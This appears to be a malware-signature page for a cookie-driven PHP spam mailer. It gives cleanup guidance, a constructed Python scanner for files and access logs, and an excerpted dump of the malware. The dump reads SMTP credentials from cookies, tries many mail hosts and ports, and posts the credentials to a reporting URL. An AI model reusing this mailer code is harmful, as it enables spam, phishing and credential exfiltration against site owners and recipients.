Malware Signatures


php.mailer.cookie

PHP mailers are, as the name suggests, scripts that send e-mail using PHP. CMSs such as WordPress, Joomla or Magento ship built-in functions for this, but malware authors bring their own purpose-built mailers. Such scripts are used to send spam and phishing e-mail, to flood mailboxes, or to send stolen data back to the attacker.
PHP mailers are often a component of spam bots and other malware, or serve purely as an exfiltration channel.
Usually these scripts receive their commands and data via POST parameters. Some variants, however, try to hide what they do and pass everything through HTTP cookies instead. That is the case for the sample below: the SMTP host, port, credentials, recipient, subject and body all arrive in short cookie names such as ho, po, ma, pa, mt and bo, and the script also accepts an optional SOCKS proxy (sh, sp, sl, sc) and a reporting URL (sd). Because the default Apache and nginx log formats do not record cookies, the payload itself leaves no trace in access_logs beyond the request to the dropped file.

Affecting

Any vulnerable PHP-based website. Outdated software or compromised passwords are common infection vectors.

Cleanup

Inspect your site's files for calls to mail(), hand-built e-mail headers such as "X-Priority:" or "Message-ID:", or socket functions (fsockopen, stream_socket_client) in files you do not recognize. For this variant, also look for clusters of $_COOKIE reads with one- or two-letter keys being passed through urldecode().
Check your site's access_logs for suspicious POST requests; these can point to the file being used to send the unwanted messages. Because this variant takes its data from cookies, the triggering request may be a plain GET with an empty body, so look for any request to PHP files in locations that should not contain executable code (for example wp-content/uploads), not only POSTs.
Also you can sign up with us and let our team remove the malware for you.
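As an added example (not part of the original page and not code from any product or CMS), the following Python script applies both checks above to constructed samples: a file-content scanner keyed on the indicators listed (mail(), socket functions, hand-built headers, and the cluster of short $_COOKIE reads seen in the dump) and an access-log filter that flags requests to PHP files outside the CMS's known entry points. The sample PHP snippets, the log lines, the scoring thresholds and the KNOWN set of entry points are all assumptions made for the demonstration.

```python
"""Triage helpers for cookie-driven PHP mailers (added example, not the page's code).
All PHP sources and log lines below are constructed for the demonstration."""
import re

# Indicators from the Cleanup section and the dump: mail()/socket calls, hand-built
# SMTP headers, error suppression, and short cookie keys read into variables.
INDICATORS = {
    "mail_call":     re.compile(r"\bmail\s*\("),
    "socket_call":   re.compile(r"\b(fsockopen|pfsockopen|stream_socket_client|socket_create)\s*\("),
    "smtp_headers":  re.compile(r"(X-Priority|Message-ID|X-Mailer)\s*:", re.I),
    "cookie_param":  re.compile(r"\$_COOKIE\[\s*['\"]([A-Za-z0-9_]{1,3})['\"]\s*\]"),
    "error_silence": re.compile(r"error_reporting\s*\(\s*0\s*\)"),
}


def scan_php(source):
    """Count each indicator in one PHP source string and return a verdict.

    mail() alone is normal in CMS code; the strong signal for this family is
    many distinct one-to-three letter cookie keys (the dump reads about 18)
    combined with a socket or mail() call.  Threshold of 5 is an assumption.
    """
    hits = {name: len(rx.findall(source)) for name, rx in INDICATORS.items()}
    hits["distinct_short_cookies"] = len(set(INDICATORS["cookie_param"].findall(source)))
    suspicious = bool(hits["distinct_short_cookies"] >= 5 and
                      (hits["socket_call"] or hits["mail_call"]))
    return {"hits": hits, "suspicious": suspicious}


# Apache/nginx "combined" format: cookies are not logged, only the request line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)')


def suspicious_requests(log_lines, known_paths):
    """Flag requests to PHP files that are not expected CMS entry points.

    POSTs are the classic mailer pattern, but a cookie-driven mailer can be
    triggered with a plain GET, so the method is reported rather than filtered on.
    Returns a list of (ip, method, path) tuples.
    """
    flagged = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # skip lines that are not in combined format
        path = m.group("path").split("?", 1)[0]
        if path.endswith(".php") and path not in known_paths:
            flagged.append((m.group("ip"), m.group("method"), path))
    return flagged


# --- constructed samples -----------------------------------------------------
BENIGN_PHP = r'''<?php
// constructed: ordinary site code using the built-in mailer, no cookie input
$to = get_option('admin_email');
mail($to, 'New comment on your post', $message, 'From: noreply@example.com');
'''

MAILER_PHP = r'''<?php
// constructed to mirror the shape of the dump above
error_reporting(0);
$host = urldecode($_COOKIE['ho']); $port = $_COOKIE['po'];
$mail = urldecode($_COOKIE['ma']); $pass = urldecode($_COOKIE['pa']);
$mailto = urldecode($_COOKIE['mt']); $subj = urldecode($_COOKIE['su']);
$body = stripslashes(urldecode($_COOKIE['bo']));
$headers = "X-Priority: 1\r\nMessage-ID: <" . md5($body) . "@" . $host . ">\r\n";
$fp = fsockopen($host, $port, $errno, $errstr, 30);
fwrite($fp, "EHLO " . $host . "\r\n");
'''

LOG_LINES = [  # constructed, combined log format, RFC 5737 test addresses
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [10/Oct/2023:13:56:01 +0000] "POST /wp-content/uploads/2023/10/cache.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [10/Oct/2023:13:56:02 +0000] "GET /wp-content/uploads/2023/10/cache.php?a=1 HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]
# Assumed allow-list of legitimate PHP entry points for a WordPress install.
KNOWN = {"/index.php", "/wp-login.php", "/wp-admin/admin-ajax.php", "/xmlrpc.php"}

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_PHP), ("mailer", MAILER_PHP)):
        print(label, scan_php(src))
    for ip, method, path in suspicious_requests(LOG_LINES, KNOWN):
        print("suspicious request:", ip, method, path)
```

On a real server, feed scan_php() the contents of every .php file under the web root and suspicious_requests() the actual access_log with the entry points of your CMS in KNOWN; a file that both scores as suspicious and appears in the flagged requests is the one to quarantine first.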

Dump


...
error_reporting(0);
$host = urldecode($_COOKIE['ho']);
$port = $_COOKIE['po'];
$socks_host = $_COOKIE['sh'];
$socks_port = $_COOKIE['sp'];
$mail = urldecode($_COOKIE['ma']);
$login = urldecode($_COOKIE['lo']);
$pass = urldecode($_COOKIE['pa']);
$mailto = urldecode($_COOKIE['mt']);
$fname = urldecode($_COOKIE['fn']);
$organ = urldecode($_COOKIE['or']);
$ehlo = urldecode($_COOKIE['eh']);
$subj = urldecode($_COOKIE['su']);
$sub = $subj;
$body = stripslashes(urldecode($_COOKIE['bo']));
$sds = urldecode($_COOKIE['sd']);
$tout = $_COOKIE['rt'];
$socks_user = urldecode($_COOKIE['sl']);
$socks_pass = urldecode($_COOKIE['sc']);
$rel = $mail . ':' . $pass;

if (!$_COOKIE['a']) {
if ($socks_host) {
$socks = $socks_host . ':' . $socks_port;
}

$body = str_replace("{br}", "\n", $body);
$ex = explode("@", $mail);

...

if ($try == 'BAUTH') {
$try = mch($smtp, $lport, $fm, $pass);
}

mch('smtp.' . $host, 25, $em, $pass);
mch('smtp.' . $host, 25, $fm, $pass);
mch('mail.' . $host, 25, $em, $pass);
mch('mail.' . $host, 25, $fm, $pass);
mch('mx.' . $host, 25, $em, $pass);
mch('mx.' . $host, 25, $fm, $pass);
mch($host, 25, $em, $pass);
mch('relay.' . $host, 25, $em, $pass);
mch('email.' . $host, 25, $em, $pass);
mch('pop.' . $host, 25, $em, $pass);
mch('pop3.' . $host, 25, $em, $pass);
mch('imap.' . $host, 25, $em, $pass);
mch('freemail.' . $host, 25, $em, $pass);
mch('box.' . $host, 25, $em, $pass);
mch('smtp.mail.' . $host, 25, $em, $pass);
mch($host, 25, $fm, $pass);
mch('relay.' . $host, 25, $fm, $pass);
mch('email.' . $host, 25, $fm, $pass);
mch('pop.' . $host, 25, $fm, $pass);
mch('pop3.' . $host, 25, $fm, $pass);
mch('imap.' . $host, 25, $fm, $pass);
mch('freemail.' . $host, 25, $fm, $pass);
mch('box.' . $host, 25, $fm, $pass);
mch('smtp.mail.' . $host, 25, $fm, $pass);
mch('ssl://smtp.' . $host, 465, $em, $pass);
mch('ssl://mail.' . $host, 465, $em, $pass);
mch('ssl://smtp.' . $host, 465, $fm, $pass);
mch('ssl://mail.' . $host, 465, $fm, $pass);
mch('ssl://mx.' . $host, 465, $em, $pass);
mch('ssl://mx.' . $host, 465, $fm, $pass);
mch('ssl://' . $host, 465, $em, $pass);
mch('ssl://relay.' . $host, 465, $em, $pass);
mch('ssl://email.' . $host, 465, $em, $pass);
mch('ssl://pop.' . $host, 465, $em, $pass);
mch('ssl://pop3.' . $host, 465, $em, $pass);
mch('ssl://imap.' . $host, 465, $em, $pass);
mch('ssl://freemail.' . $host, 465, $em, $pass);
mch('ssl://box.' . $host, 465, $em, $pass);
mch('ssl://smtp.mail.' . $host, 465, $em, $pass);
mch('ssl://' . $host, 465, $fm, $pass);
mch('ssl://relay.' . $host, 465, $fm, $pass);
mch('ssl://email.' . $host, 465, $fm, $pass);
mch('ssl://pop.' . $host, 465, $fm, $pass);
mch('ssl://pop3.' . $host, 465, $fm, $pass);
mch('ssl://imap.' . $host, 465, $fm, $pass);
mch('ssl://freemail.' . $host, 465, $fm, $pass);
mch('ssl://box.' . $host, 465, $fm, $pass);
mch('ssl://smtp.mail.' . $host, 465, $fm, $pass);
post_mch($sds, 'C2', $rel);
}

...